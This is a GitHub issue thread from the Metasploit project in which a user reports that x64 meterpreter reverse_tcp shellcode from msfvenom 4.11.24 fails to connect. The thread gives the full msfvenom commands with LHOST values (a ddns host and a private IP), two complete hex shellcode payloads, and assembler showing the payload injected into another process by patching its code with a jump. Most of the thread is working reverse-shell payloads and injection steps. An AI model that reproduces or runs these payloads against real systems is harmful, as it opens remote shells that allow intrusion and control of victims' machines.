### ISSUE TITLE
msfvenom x64 reverse_tcp payload -hex error

### ISSUE THREAD

**Issue by kainpark7894** [rapid7/metasploit-framework#6837]
msfvenom 4.11.20 version -> shell code x64reverse_tcp connnect not error

msfvenom 4.11.24 version -> shell code x64reverse_tcp connnect error

payload hex shell code generate -> thread & jmp location -> error tcp connject

msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/xor -b '\x00' -i 3 LHOST=test.ddns.net LPORT=443 -f hex

msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/xor -b '\x00' -i 3 LHOST=192.168.0.2 LPORT=443 -f hex

4.11.20 version -> connect not error

4.11.24 version -> connect error

![version](https://cloud.githubusercontent.com/assets/18137745/14945435/18ac8ce2-104c-11e6-8437-8bbacc1cb2c2.png)

**Comment by kainpark7894** [comment]
exe file not error

oldversion(4.1.1.20) shell code createthread & jmp location run -> connect not error

new version(4.1.1.24) shell code createthread & jmp location run -> connect error

**Comment by wvu-r7** [comment]
What are you trying to do here, @kainpark7894? I can't decipher your bug report.

**Comment by kainpark7894** [comment]
sorry Bad English 

Framework: 4.11.24-dev-d4f1c78c5c6c67288fee328981c962af378fa4ca
Console  : 4.11.24-dev-d4f1c78c5c6c67288fee328981c962af378fa4ca

msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/xor -b '\x00' -i 3 LHOST=192.168.0.2 LPORT=443 -f hex

4.11.20 version payload hex(no error)

Payload size: 631 bytes

4831c94881e9b6ffffff488d05efffffff48bbdae0f731fc83f85848315827482df8ffffffe2f492d13e797d6a43a7251fbfbcf96c07a725a84c3858630dec436bdb79cddbdf10f71808ce03610c194fc94a048cc82bae81488f808af72bae36bb59d3fad01598c06d4ab43d2f9c7c86fffd7a87fc734f623c33a417658f07a089821c8934d94fd00aa6045037ef4f6a8adb045037af4f6aaa9304d4d2c54dace90a04eaa5233b80a4c160fb244eceec99c28d3988dd46b090481efbeecd3ba9d9132a5a1d970ce3d7463edb658f8c6150c34cdb2d0ac795bf8b4d0b35044ff99c480cfb2c8ed7028e8bb3122404336990c29a9654464fd0186f0d1aac8246e019fbacae94c304adfccb09e2b4fadfb99c480cff2c8ed78799484093210447fd91c29c9aee8b8fa9d9130d8324d759b88282149a3cce5da95b2f6c9a3770e7b9999a1693ee9deeaa273cb3862c317092ea9c7fe9658f46b7914aaa93e463a7e0d8c3055280c6bbe3d8c2f71bcd8f05a08c8ac53f2906f6a0628f3bfd6270d2ad512924da648f07b89979655b0e8ff834b2c60d8535df4ad0118e7d1b2d70c7a951010424a5c78e209979a6d4ba6ff834904a8bb175ce5fad512104529ccebd787db72d24b00ac795d28ab315106aef72d8c34c93e66317a9512101eaace503a0808bc52224350538109cb30ee677079f8d8bcf1f45d18e17b2830d820d8f17e1d8821493ec7d4fd01182f683c1dce21e0d8bc5182c06c0ace90a055295c78e3b904ab59adf8dde29873c99589d8f7ac980821b820d8f47e1d88214b165d5465bd3ec43eb9a5a50b8997939b528eef834913c82325970f81e90c28f934c494f642eb6f89a9a685f8bd89a051ca77fb2438e3c99db65d458



4.11.24 version payload hex(error)

Payload size: 631 bytes
4831c94881e9b6ffffff488d05efffffff48bb1b820a7c8c801e6348315827482df8ffffffe2f453
b3c3340d69a59ce47d42f1896fe19ce4cab12ec83f8e0e2b11d434bdd8392b367af5837362ea796e
f4d29055d33fcea075171453ec3fce1786fc04881e0c623f34d220e434881ca7c265ee5ee75a6ce8
d4a6aa101aa6242a6117128e4bf06c5ae2330a5748c66ce0624e0a5748866ce042060ad3adec6e26
019f0aedda0a180a4c546efc5b67ed667157833ef7f4653a78dd10fc91e418233186245d62be2f69
3fd330dc1aa6afebb85642dc5223e41f571e430c4a2d6c7374dd02fc53a7f488661ebd155b2d10e3
785794912b6f6c5af0fa031dd3ab656af16ea2a9ebea2727145e07e5cbd3fc3374dd02f853a7f40d
71dd4e945e2d64777957929d91a2ac23318603845bfe7a326a171a9d43e77e23b3ba629d4859c433
710f189491b4cd20cfa9bd8153185318020971ee1aa6653d79dfa4949b4a846a30560b55ffef9869
3057f91cb2a6262a641fcb38562fd52a8a1a35fa1d59f127b9bc2add1ba6243271ec6b5c71a6dbbe
5a5303824af6695af91b731c5259e423b9940a23daeeadaa71eca8d3c546dbbe78df85b60ae77c27
b9b40a55e3e79ef295222323cf23e41f3a1fbd126f43ccf830564294994a3423b9b40fedd3cc202a
681ecb255b1c26b2f809bd09995e2415651ec1183af8ad9d5a16038572a6346b30171a9493546c5a
f917f884bef5c194e51ecb1f532fe326019f0b55eaeeadb178dfbb9da0a4fda36fa9975fe2a65943
6817158572a6646b30171ab61afc65d13b794dece573733271ec37b257c7dbbe79a98c352659db94
7857819433606ceec623f69de5417c01300f0b1bd85691c966a997dc1ac063
payload code 631 byte

--eg--
original assembler:
mov [rax],rax
mov [rbx],rcx
...
edit assembler:
jmp mypayload

mypayload:
03C40000 - 48 31 C9              - xor rcx,rcx
03C40003 - 48 81 E9 B6FFFFFF     - sub rcx,FFFFFFB6 { -74 }
03C4000A - 48 8D 05 EFFFFFFF     - lea rax,[03C40000] { [48C93148] }
03C40011 - 48 BB 1B820A7C8C801E63 - mov rbx,631E808C7C0A821B { 2081063451 }
03C4001B - 48 31 58 27           - xor [rax+27],rbx
03C4001F - 48 2D F8FFFFFF        - sub rax,FFFFFFF8 { -8 }
....

assembler code edit -> my payload execute -> tcp/ip  connect error and target process crash

**Comment by join-us** [comment]
@kainpark7894 If you have questions of usage, please access [https://community.rapid7.com/community/metasploit/](https://community.rapid7.com/community/metasploit/)
